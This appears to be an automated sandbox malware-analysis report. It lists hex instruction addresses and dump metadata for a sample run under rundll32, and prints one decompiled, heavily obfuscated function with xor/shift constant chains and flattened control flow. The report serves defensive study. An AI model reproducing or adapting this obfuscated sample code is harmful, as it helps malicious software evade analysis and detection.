                                                                                                                                                            0x0037c4f2
                                                                                                                                                            0x0037c4fd
                                                                                                                                                            0x0037c505
                                                                                                                                                            0x0037c510
                                                                                                                                                            0x0037c51b
                                                                                                                                                            0x0037c523
                                                                                                                                                            0x0037c52e
                                                                                                                                                            0x0037c542
                                                                                                                                                            0x0037c549
                                                                                                                                                            0x0037c554
                                                                                                                                                            0x0037c55f
                                                                                                                                                            0x0037c572
                                                                                                                                                            0x0037c579
                                                                                                                                                            0x0037c584
                                                                                                                                                            0x0037c594
                                                                                                                                                            0x0037c5a1
                                                                                                                                                            0x0037c5a5
                                                                                                                                                            0x0037c5ad
                                                                                                                                                            0x0037c5b5
                                                                                                                                                            0x0037c5b9
                                                                                                                                                            0x0037c5c1
                                                                                                                                                            0x0037c5c9
                                                                                                                                                            0x0037c5d1
                                                                                                                                                            0x0037c5dc
                                                                                                                                                            0x0037c5e7
                                                                                                                                                            0x0037c5f2
                                                                                                                                                            0x0037c5fd
                                                                                                                                                            0x0037c608
                                                                                                                                                            0x0037c610
                                                                                                                                                            0x0037c61b
                                                                                                                                                            0x0037c623
                                                                                                                                                            0x0037c628
                                                                                                                                                            0x0037c62d
                                                                                                                                                            0x0037c635
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c642
                                                                                                                                                            0x0037c642
                                                                                                                                                            0x0037c647
                                                                                                                                                            0x0037c647
                                                                                                                                                            0x0037c647
                                                                                                                                                            0x0037c64c
                                                                                                                                                            0x0037c64c
                                                                                                                                                            0x0037c64c
                                                                                                                                                            0x0037c64c
                                                                                                                                                            0x0037c64e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c654
                                                                                                                                                            0x0037c917
                                                                                                                                                            0x0037c91c
                                                                                                                                                            0x0037c924
                                                                                                                                                            0x0037c926
                                                                                                                                                            0x0037c92b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c65a
                                                                                                                                                            0x0037c660
                                                                                                                                                            0x0037c83b
                                                                                                                                                            0x0037c847
                                                                                                                                                            0x0037c852
                                                                                                                                                            0x0037c857
                                                                                                                                                            0x0037c865
                                                                                                                                                            0x0037c89e
                                                                                                                                                            0x0037c8a5
                                                                                                                                                            0x0037c8b4
                                                                                                                                                            0x0037c8c5
                                                                                                                                                            0x0037c8c8
                                                                                                                                                            0x0037c8d8
                                                                                                                                                            0x0037c8de
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c666
                                                                                                                                                            0x0037c66c
                                                                                                                                                            0x0037ca66
                                                                                                                                                            0x0037ca7b
                                                                                                                                                            0x0037c672
                                                                                                                                                            0x0037c674
                                                                                                                                                            0x0037c779
                                                                                                                                                            0x0037c782
                                                                                                                                                            0x0037c790
                                                                                                                                                            0x0037c796
                                                                                                                                                            0x0037c799
                                                                                                                                                            0x0037c7a2
                                                                                                                                                            0x0037c7ac
                                                                                                                                                            0x0037c7e3
                                                                                                                                                            0x0037c7e8
                                                                                                                                                            0x0037c7eb
                                                                                                                                                            0x0037c7f2
                                                                                                                                                            0x0037c821
                                                                                                                                                            0x0037c7f4
                                                                                                                                                            0x0037c805
                                                                                                                                                            0x0037c812
                                                                                                                                                            0x0037c817
                                                                                                                                                            0x0037c81a
                                                                                                                                                            0x0037c81a
                                                                                                                                                            0x0037c830
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c67a
                                                                                                                                                            0x0037c680
                                                                                                                                                            0x0037c76f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c686
                                                                                                                                                            0x0037c688
                                                                                                                                                            0x0037c752
                                                                                                                                                            0x0037c759
                                                                                                                                                            0x0037c765
                                                                                                                                                            0x0037c767
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c642
                                                                                                                                                            0x0037c647
                                                                                                                                                            0x0037c647
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c647
                                                                                                                                                            0x0037c68e
                                                                                                                                                            0x0037c68e
                                                                                                                                                            0x0037c694
                                                                                                                                                            0x0037c69a
                                                                                                                                                            0x0037c6a6
                                                                                                                                                            0x0037c6ae
                                                                                                                                                            0x0037c6b4
                                                                                                                                                            0x0037c6f8
                                                                                                                                                            0x0037c71c
                                                                                                                                                            0x0037c71f
                                                                                                                                                            0x0037c724
                                                                                                                                                            0x0037c727
                                                                                                                                                            0x0037c727
                                                                                                                                                            0x0037ca3e
                                                                                                                                                            0x0037ca3e
                                                                                                                                                            0x0037ca43
                                                                                                                                                            0x0037ca48
                                                                                                                                                            0x0037ca48
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c694
                                                                                                                                                            0x0037c688
                                                                                                                                                            0x0037c680
                                                                                                                                                            0x0037c674
                                                                                                                                                            0x0037c66c
                                                                                                                                                            0x0037c660
                                                                                                                                                            0x0037ca85
                                                                                                                                                            0x0037ca8f
                                                                                                                                                            0x0037ca8f
                                                                                                                                                            0x0037c933
                                                                                                                                                            0x0037c935
                                                                                                                                                            0x0037ca2c
                                                                                                                                                            0x0037ca33
                                                                                                                                                            0x0037ca39
                                                                                                                                                            0x0037ca3b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c93b
                                                                                                                                                            0x0037c93b
                                                                                                                                                            0x0037c941
                                                                                                                                                            0x0037ca15
                                                                                                                                                            0x0037ca1b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c947
                                                                                                                                                            0x0037c947
                                                                                                                                                            0x0037c94d
                                                                                                                                                            0x0037c9f3
                                                                                                                                                            0x0037c9f9
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c953
                                                                                                                                                            0x0037c953
                                                                                                                                                            0x0037c955
                                                                                                                                                            0x0037c9ce
                                                                                                                                                            0x0037c9d4
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c63d
                                                                                                                                                            0x0037c957
                                                                                                                                                            0x0037c957
                                                                                                                                                            0x0037c95d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c963
                                                                                                                                                            0x0037c97c
                                                                                                                                                            0x0037c995
                                                                                                                                                            0x0037c99c
                                                                                                                                                            0x0037c9ab
                                                                                                                                                            0x0037c9ad
                                                                                                                                                            0x0037c9b2
                                                                                                                                                            0x0037c9b7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037c9b7
                                                                                                                                                            0x0037c95d
                                                                                                                                                            0x0037c955
                                                                                                                                                            0x0037c94d
                                                                                                                                                            0x0037c941
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ca4d
                                                                                                                                                            0x0037ca4d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ca59
                                                                                                                                                            0x0037c647
                                                                                                                                                            0x0037c642

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                                                            • API String ID: 0-258179307
                                                                                                                                                            • Opcode ID: 8102f86cb4f273f45a1d007f899a66b45ca4c875abcc8afe29a325352160ef4b
                                                                                                                                                            • Instruction ID: b844d51c57e4a8fa3bfda7ddeee4b7f3919b9266f907a65712477d04d8d34cc0
                                                                                                                                                            • Opcode Fuzzy Hash: 8102f86cb4f273f45a1d007f899a66b45ca4c875abcc8afe29a325352160ef4b
                                                                                                                                                            • Instruction Fuzzy Hash: 3072E1715093819FD379CF25C58AA9FBBE2BBC4304F10891DE6DA8A260D7B58949CF03
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00384B87 Relevance: 23.1, Strings: 18, Instructions: 604COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00384B87(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				void* _t703;
				void* _t707;
				signed int _t708;
				signed int _t717;
				void* _t730;
				void* _t736;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				void* _t758;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t811;

				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xa2c333;
				_v2612 = 0xd97943;
				_v2696 = 0x74b91;
				_v2696 = _v2696 + 0xffffab65;
				_v2696 = _v2696 ^ 0x0006f6df;
				_v2804 = 0x130b03;
				_v2804 = _v2804 << 9;
				_v2804 = _v2804 + 0x8374;
				_v2804 = _v2804 ^ 0x26068974;
				_v2876 = 0x240a80;
				_v2876 = _v2876 >> 6;
				_v2876 = _v2876 >> 5;
				_v2876 = _v2876 ^ 0x3e269fec;
				_v2876 = _v2876 ^ 0x3e253447;
				_v2924 = 0x49db5b;
				_v2924 = _v2924 + 0xd552;
				_t803 = __ecx;
				_t798 = 0xce4571;
				_t738 = 0x27;
				_v2924 = _v2924 / _t738;
				_v2924 = _v2924 + 0x3019;
				_v2924 = _v2924 ^ 0x0006d24f;
				_v2796 = 0xf8ea63;
				_v2796 = _v2796 << 3;
				_v2796 = _v2796 + 0x8798;
				_v2796 = _v2796 ^ 0x07c9cae5;
				_v2864 = 0x679d3b;
				_t739 = 0x25;
				_v2864 = _v2864 * 0x7a;
				_v2864 = _v2864 / _t739;
				_v2864 = _v2864 << 0xc;
				_v2864 = _v2864 ^ 0x5a5eda92;
				_v2688 = 0xbc1f25;
				_v2688 = _v2688 << 0xd;
				_v2688 = _v2688 ^ 0x83e15555;
				_v2700 = 0xc3e9b4;
				_v2700 = _v2700 ^ 0x7e7d7a5b;
				_v2700 = _v2700 ^ 0x7ebc2479;
				_v2684 = 0x348655;
				_v2684 = _v2684 + 0xffff5240;
				_v2684 = _v2684 ^ 0x0038d539;
				_v2836 = 0xc8c90d;
				_v2836 = _v2836 | 0x6050777e;
				_v2836 = _v2836 + 0xfffffb37;
				_v2836 = _v2836 << 0xe;
				_v2836 = _v2836 ^ 0x3ea8df0c;
				_v2664 = 0x4ea234;
				_v2664 = _v2664 ^ 0x152f142f;
				_v2664 = _v2664 ^ 0x1568dd81;
				_v2900 = 0xa78742;
				_v2900 = _v2900 * 0x70;
				_v2900 = _v2900 + 0x89c7;
				_v2900 = _v2900 * 0x26;
				_v2900 = _v2900 ^ 0xe13351a3;
				_v2752 = 0x43c729;
				_v2752 = _v2752 * 9;
				_v2752 = _v2752 >> 0xc;
				_v2752 = _v2752 ^ 0x0004a0a7;
				_v2656 = 0x163ba0;
				_v2656 = _v2656 | 0x3b2cca0a;
				_v2656 = _v2656 ^ 0x3b3c61f3;
				_v2800 = 0x539f85;
				_v2800 = _v2800 + 0xffff9927;
				_v2800 = _v2800 >> 0xd;
				_v2800 = _v2800 ^ 0x000ca278;
				_v2892 = 0xaa9f70;
				_v2892 = _v2892 | 0xffd04745;
				_t740 = 0x33;
				_v2892 = _v2892 * 0x48;
				_v2892 = _v2892 + 0xabed;
				_v2892 = _v2892 ^ 0xfe85b4b6;
				_v2728 = 0x66b1f8;
				_v2728 = _v2728 + 0xffffb85a;
				_v2728 = _v2728 + 0xffff17c5;
				_v2728 = _v2728 ^ 0x00666892;
				_v2792 = 0x34b823;
				_v2792 = _v2792 + 0x705f;
				_v2792 = _v2792 | 0x13d147dd;
				_v2792 = _v2792 ^ 0x13fd2081;
				_v2884 = 0x7f5269;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 + 0xdf59;
				_v2884 = _v2884 ^ 0x086ba2e3;
				_v2884 = _v2884 ^ 0x086346ed;
				_v2784 = 0x4150c;
				_v2784 = _v2784 ^ 0xadfae27c;
				_v2784 = _v2784 << 0xf;
				_v2784 = _v2784 ^ 0x7bb89155;
				_v2860 = 0x3ff4f9;
				_v2860 = _v2860 + 0x97ef;
				_v2860 = _v2860 ^ 0x8a52113e;
				_v2860 = _v2860 * 0x3b;
				_v2860 = _v2860 ^ 0xd244680a;
				_v2920 = 0xf20633;
				_v2920 = _v2920 >> 0xa;
				_v2920 = _v2920 << 6;
				_v2920 = _v2920 | 0x86ded8f3;
				_v2920 = _v2920 ^ 0x86d0715a;
				_v2676 = 0xbc4416;
				_v2676 = _v2676 + 0x253a;
				_v2676 = _v2676 ^ 0x00bded5f;
				_v2928 = 0x15fa7c;
				_v2928 = _v2928 >> 1;
				_v2928 = _v2928 * 0x6e;
				_v2928 = _v2928 >> 4;
				_v2928 = _v2928 ^ 0x00445a38;
				_v2844 = 0xaff44e;
				_v2844 = _v2844 * 0x28;
				_v2844 = _v2844 ^ 0x281c7ad4;
				_v2844 = _v2844 * 0xe;
				_v2844 = _v2844 ^ 0xcf625ac8;
				_v2744 = 0x5c05ba;
				_v2744 = _v2744 << 1;
				_v2744 = _v2744 ^ 0x54918a83;
				_v2744 = _v2744 ^ 0x542c1472;
				_v2904 = 0xa399f4;
				_v2904 = _v2904 / _t740;
				_t741 = 9;
				_v2904 = _v2904 / _t741;
				_v2904 = _v2904 >> 0xb;
				_v2904 = _v2904 ^ 0x000d27e7;
				_v2912 = 0xbe4d5b;
				_v2912 = _v2912 << 2;
				_v2912 = _v2912 >> 8;
				_v2912 = _v2912 + 0xbc5;
				_v2912 = _v2912 ^ 0x000f01bd;
				_v2888 = 0xb7f9c;
				_v2888 = _v2888 ^ 0x23a090a0;
				_v2888 = _v2888 + 0xffffcb65;
				_v2888 = _v2888 + 0xffffb53f;
				_v2888 = _v2888 ^ 0x23a896a2;
				_v2776 = 0xcbb323;
				_v2776 = _v2776 + 0x81c3;
				_v2776 = _v2776 >> 1;
				_v2776 = _v2776 ^ 0x00676393;
				_v2648 = 0x271f91;
				_v2648 = _v2648 + 0xffff9397;
				_v2648 = _v2648 ^ 0x0029f035;
				_v2896 = 0x78618c;
				_v2896 = _v2896 << 0xc;
				_v2896 = _v2896 ^ 0x0a821cde;
				_v2896 = _v2896 + 0xb475;
				_v2896 = _v2896 ^ 0x8c94da80;
				_v2720 = 0xacdc2a;
				_v2720 = _v2720 | 0x57611697;
				_v2720 = _v2720 ^ 0xc01b1ef4;
				_v2720 = _v2720 ^ 0x97fc8dfe;
				_v2668 = 0x55603e;
				_v2668 = _v2668 >> 1;
				_v2668 = _v2668 ^ 0x002dad1d;
				_v2828 = 0xf126f6;
				_t742 = 0x29;
				_v2828 = _v2828 * 0x43;
				_v2828 = _v2828 + 0x8cbb;
				_v2828 = _v2828 ^ 0x3f126f56;
				_v2768 = 0x9c087b;
				_v2768 = _v2768 << 9;
				_v2768 = _v2768 + 0xffffe171;
				_v2768 = _v2768 ^ 0x3813f585;
				_v2880 = 0xb815a3;
				_v2880 = _v2880 ^ 0x72879ea7;
				_v2880 = _v2880 / _t742;
				_v2880 = _v2880 + 0xc3b;
				_v2880 = _v2880 ^ 0x02c00b8a;
				_v2872 = 0xffe9a8;
				_v2872 = _v2872 | 0x05f4b9e7;
				_v2872 = _v2872 + 0xffff2424;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 ^ 0xff8a2c7e;
				_v2808 = 0x17a98a;
				_t743 = 0x6a;
				_v2808 = _v2808 * 0x35;
				_v2808 = _v2808 + 0x8a0b;
				_v2808 = _v2808 ^ 0x04e27d5d;
				_v2644 = 0x3aca8c;
				_v2644 = _v2644 | 0x1dba2023;
				_v2644 = _v2644 ^ 0x1dba33fd;
				_v2760 = 0xa9a4ba;
				_v2760 = _v2760 ^ 0x6721c4f3;
				_v2760 = _v2760 + 0xffff7b43;
				_v2760 = _v2760 ^ 0x6786e634;
				_v2660 = 0xef5940;
				_t327 =  &_v2660; // 0xef5940
				_v2660 =  *_t327 / _t743;
				_v2660 = _v2660 ^ 0x0008b7a5;
				_v2640 = 0x8c91f9;
				_v2640 = _v2640 + 0x2aa0;
				_v2640 = _v2640 ^ 0x008fd6f1;
				_v2716 = 0xebae10;
				_v2716 = _v2716 + 0x2e93;
				_v2716 = _v2716 >> 3;
				_v2716 = _v2716 ^ 0x0012b27f;
				_v2692 = 0xf4ef17;
				_v2692 = _v2692 ^ 0x14a8ca79;
				_v2692 = _v2692 ^ 0x145940a6;
				_v2712 = 0x90da21;
				_v2712 = _v2712 * 0x5c;
				_v2712 = _v2712 << 6;
				_v2712 = _v2712 ^ 0x039c340b;
				_v2812 = 0x599c06;
				_v2812 = _v2812 | 0x7b64813d;
				_v2812 = _v2812 * 0x3e;
				_v2812 = _v2812 ^ 0xe8633365;
				_v2748 = 0x57b46;
				_t744 = 0x38;
				_v2748 = _v2748 / _t744;
				_v2748 = _v2748 + 0xffffe4a2;
				_v2748 = _v2748 ^ 0xffff7983;
				_v2856 = 0xb347e1;
				_v2856 = _v2856 << 0xf;
				_v2856 = _v2856 + 0xc3e6;
				_v2856 = _v2856 ^ 0xcd6ff0ef;
				_v2856 = _v2856 ^ 0x6e991901;
				_v2756 = 0x3d21e7;
				_v2756 = _v2756 + 0x4052;
				_v2756 = _v2756 + 0xfab6;
				_v2756 = _v2756 ^ 0x0033d413;
				_v2680 = 0xeea097;
				_v2680 = _v2680 * 0x29;
				_v2680 = _v2680 ^ 0x26367c85;
				_v2852 = 0x9a84c7;
				_v2852 = _v2852 << 4;
				_v2852 = _v2852 + 0x5305;
				_v2852 = _v2852 * 0x47;
				_v2852 = _v2852 ^ 0xadc8f5b7;
				_v2736 = 0x1d92c0;
				_v2736 = _v2736 ^ 0x4e3febcd;
				_v2736 = _v2736 ^ 0x2a5eeaad;
				_v2736 = _v2736 ^ 0x647637b5;
				_v2916 = 0x7a6f6e;
				_v2916 = _v2916 << 3;
				_v2916 = _v2916 | 0x74549758;
				_v2916 = _v2916 * 0x5e;
				_v2916 = _v2916 ^ 0x014df6ca;
				_v2820 = 0x88f64;
				_v2820 = _v2820 << 0xb;
				_v2820 = _v2820 ^ 0x8d7f89a1;
				_v2820 = _v2820 ^ 0xc90720e1;
				_v2672 = 0x9d7b6a;
				_v2672 = _v2672 * 0x74;
				_v2672 = _v2672 ^ 0x47521deb;
				_v2868 = 0x2a980b;
				_v2868 = _v2868 << 2;
				_v2868 = _v2868 * 0x37;
				_v2868 = _v2868 * 0x45;
				_v2868 = _v2868 ^ 0xdda58f8d;
				_v2704 = 0xd94882;
				_v2704 = _v2704 >> 7;
				_v2704 = _v2704 ^ 0x000dd1c5;
				_v2908 = 0x8685cf;
				_v2908 = _v2908 >> 6;
				_v2908 = _v2908 + 0x478f;
				_v2908 = _v2908 | 0x9a4acbdf;
				_v2908 = _v2908 ^ 0x9a416c75;
				_v2724 = 0x3983d7;
				_v2724 = _v2724 ^ 0xaf8ece10;
				_v2724 = _v2724 + 0xfffffe8c;
				_v2724 = _v2724 ^ 0xafb9f002;
				_v2652 = 0xb48fd9;
				_v2652 = _v2652 >> 7;
				_v2652 = _v2652 ^ 0x0003170e;
				_v2732 = 0x26e706;
				_v2732 = _v2732 + 0xffff7cb3;
				_v2732 = _v2732 << 7;
				_v2732 = _v2732 ^ 0x13307998;
				_v2840 = 0xdaf489;
				_v2840 = _v2840 ^ 0x20b9ad9c;
				_v2840 = _v2840 + 0xa5fa;
				_v2840 = _v2840 ^ 0x206e4944;
				_v2848 = 0x15799;
				_v2848 = _v2848 + 0xffffbd76;
				_v2848 = _v2848 | 0x84cc3dff;
				_v2848 = _v2848 ^ 0x84c4ee28;
				_v2740 = 0x344f78;
				_v2740 = _v2740 | 0xed30b44e;
				_v2740 = _v2740 + 0x582d;
				_v2740 = _v2740 ^ 0xed3a4892;
				_v2764 = 0x3aec11;
				_t745 = 0x14;
				_v2764 = _v2764 * 0x24;
				_v2764 = _v2764 * 0xd;
				_v2764 = _v2764 ^ 0x6bb19aaa;
				_v2772 = 0xa2a4e3;
				_v2772 = _v2772 * 0x54;
				_v2772 = _v2772 + 0xd74c;
				_v2772 = _v2772 ^ 0x35517ae7;
				_v2780 = 0xc7cad3;
				_v2780 = _v2780 ^ 0xe16f0727;
				_v2780 = _v2780 + 0xa55f;
				_v2780 = _v2780 ^ 0xe1ad612a;
				_v2788 = 0x30bac2;
				_v2788 = _v2788 << 2;
				_v2788 = _v2788 * 0x19;
				_v2788 = _v2788 ^ 0x130f6af8;
				_v2708 = 0x5b81b7;
				_v2708 = _v2708 << 0xd;
				_v2708 = _v2708 ^ 0x7032fecb;
				_v2816 = 0xe0b39a;
				_v2816 = _v2816 + 0xf3c;
				_v2816 = _v2816 * 0x29;
				_v2816 = _v2816 ^ 0x23fa5b32;
				_v2832 = 0xb37143;
				_v2832 = _v2832 + 0xffff99de;
				_v2832 = _v2832 / _t745;
				_v2832 = _v2832 | 0xcb90c15e;
				_v2832 = _v2832 ^ 0xcb9cb56b;
				_v2824 = 0xf7e429;
				_v2824 = _v2824 << 0x10;
				_v2824 = _v2824 ^ 0x4b169193;
				_v2824 = _v2824 ^ 0xaf30b470;
				_t703 = E00387CDB(_t745);
				_t797 = _v2708;
				_t736 = _t703;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t811 = _t798 - 0xa06a9d5;
							if(_t811 <= 0) {
								break;
							}
							__eflags = _t798 - 0xae01df1;
							if(__eflags == 0) {
								_push(_v2740);
								_push(0);
								_push(_t745);
								_push(1);
								_push(0);
								_push(_v2848);
								_t745 = _v2732;
								_push( &_v524);
								E0037AB87(_t745, _v2840, __eflags);
								_t804 = _t804 + 0x1c;
								_t798 = 0xfe27958;
								_t707 = 0x8a3cf08;
								goto L24;
							} else {
								__eflags = _t798 - 0xb104717;
								if(_t798 == 0xb104717) {
									_t745 = _v2748;
									_t708 = E00374816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
									_t797 = _t708;
									_t804 = _t804 + 0x10;
									__eflags = _t708;
									_t707 = 0x8a3cf08;
									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
									continue;
								} else {
									__eflags = _t798 - 0xe3ea8aa;
									if(_t798 == 0xe3ea8aa) {
										return E00381E67(_v2708, _v2816, _v2832, _v2824, _v2628);
									}
									__eflags = _t798 - 0xfe27958;
									if(_t798 != 0xfe27958) {
										goto L24;
									} else {
										E00388519(_v2764, _v2772, _t797);
										_pop(_t745);
										_t798 = 0xa06a9d5;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
							L27:
							return _t717;
						}
						if(_t811 == 0) {
							E00388519(_v2780, _v2788, _v2636);
							_pop(_t745);
							_t798 = 0xe3ea8aa;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0xce4571) {
							_push(_v2700);
							_push(_v2696);
							_push(_v2688);
							_t745 = _v2796;
							_push( &_v1044);
							E003846BB(_t745, _v2864);
							_t804 = _t804 - 0xc + 0x1c;
							_t798 = 0x2f0d176;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0x277711d) {
							_v2624 = E003759E9();
							_v2620 = 2 + E0037CB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
							_t745 =  &_v2628;
							_t717 = E00388727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
							_t804 = _t804 + 0x38;
							__eflags = _t717;
							if(__eflags != 0) {
								_t798 = 0x47e8611;
								goto L1;
							}
						} else {
							if(_t798 == 0x2f0d176) {
								E0038DA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
								 *((short*)(E0037B6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
								E00378969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
								_push(_v2860);
								_push(_v2784);
								E003747CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E0038DCF7(_v2884, 0x371308, __eflags),  &_v1564, _v2844, _v2744);
								E0037A8B0(_v2904, _t722, _v2912);
								_t745 = _v2888;
								_t717 = E0037EA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
								_t804 = _t804 + 0x5c;
								__eflags = _t717;
								if(__eflags != 0) {
									_t798 = 0x277711d;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								if(_t798 == 0x47e8611) {
									_t745 =  &_v2636;
									E0038DEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
									_t804 = _t804 + 0x10;
									asm("sbb esi, esi");
									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									_t816 = _t798 - _t707;
									if(_t798 != _t707) {
										goto L24;
									} else {
										_push(_v2916);
										_push(_v2736);
										_t730 = E0038DCF7(_v2852, 0x3713f8, _t816);
										_pop(_t758);
										E0038453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
										_t804 = _t804 + 0x24;
										E0037A8B0(_v2724, _t730, _v2652);
										_pop(_t745);
										_t798 = 0xae01df1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t798 - 0xe39a6fa;
					} while (__eflags != 0);
					return _t707;
				}
			}












































































































                                                                                                                                                            0x00384b8d
                                                                                                                                                            0x00384b97
                                                                                                                                                            0x00384ba2
                                                                                                                                                            0x00384bad
                                                                                                                                                            0x00384bb8
                                                                                                                                                            0x00384bc3
                                                                                                                                                            0x00384bce
                                                                                                                                                            0x00384bd9
                                                                                                                                                            0x00384be1
                                                                                                                                                            0x00384bec
                                                                                                                                                            0x00384bf7
                                                                                                                                                            0x00384bff
                                                                                                                                                            0x00384c04
                                                                                                                                                            0x00384c09
                                                                                                                                                            0x00384c11
                                                                                                                                                            0x00384c19
                                                                                                                                                            0x00384c21
                                                                                                                                                            0x00384c33
                                                                                                                                                            0x00384c35
                                                                                                                                                            0x00384c3a
                                                                                                                                                            0x00384c3f
                                                                                                                                                            0x00384c45
                                                                                                                                                            0x00384c4d
                                                                                                                                                            0x00384c55
                                                                                                                                                            0x00384c60
                                                                                                                                                            0x00384c68
                                                                                                                                                            0x00384c73
                                                                                                                                                            0x00384c7e
                                                                                                                                                            0x00384c8b
                                                                                                                                                            0x00384c8c
                                                                                                                                                            0x00384c96
                                                                                                                                                            0x00384c9a
                                                                                                                                                            0x00384c9f
                                                                                                                                                            0x00384ca7
                                                                                                                                                            0x00384cb2
                                                                                                                                                            0x00384cba
                                                                                                                                                            0x00384cc5
                                                                                                                                                            0x00384cd0
                                                                                                                                                            0x00384cdb
                                                                                                                                                            0x00384ce6
                                                                                                                                                            0x00384cf1
                                                                                                                                                            0x00384cfc
                                                                                                                                                            0x00384d07
                                                                                                                                                            0x00384d0f
                                                                                                                                                            0x00384d17
                                                                                                                                                            0x00384d1f
                                                                                                                                                            0x00384d24
                                                                                                                                                            0x00384d2c
                                                                                                                                                            0x00384d37
                                                                                                                                                            0x00384d42
                                                                                                                                                            0x00384d4d
                                                                                                                                                            0x00384d5a
                                                                                                                                                            0x00384d5e
                                                                                                                                                            0x00384d6b
                                                                                                                                                            0x00384d6f
                                                                                                                                                            0x00384d77
                                                                                                                                                            0x00384d8a
                                                                                                                                                            0x00384d91
                                                                                                                                                            0x00384d99
                                                                                                                                                            0x00384da4
                                                                                                                                                            0x00384daf
                                                                                                                                                            0x00384dba
                                                                                                                                                            0x00384dc5
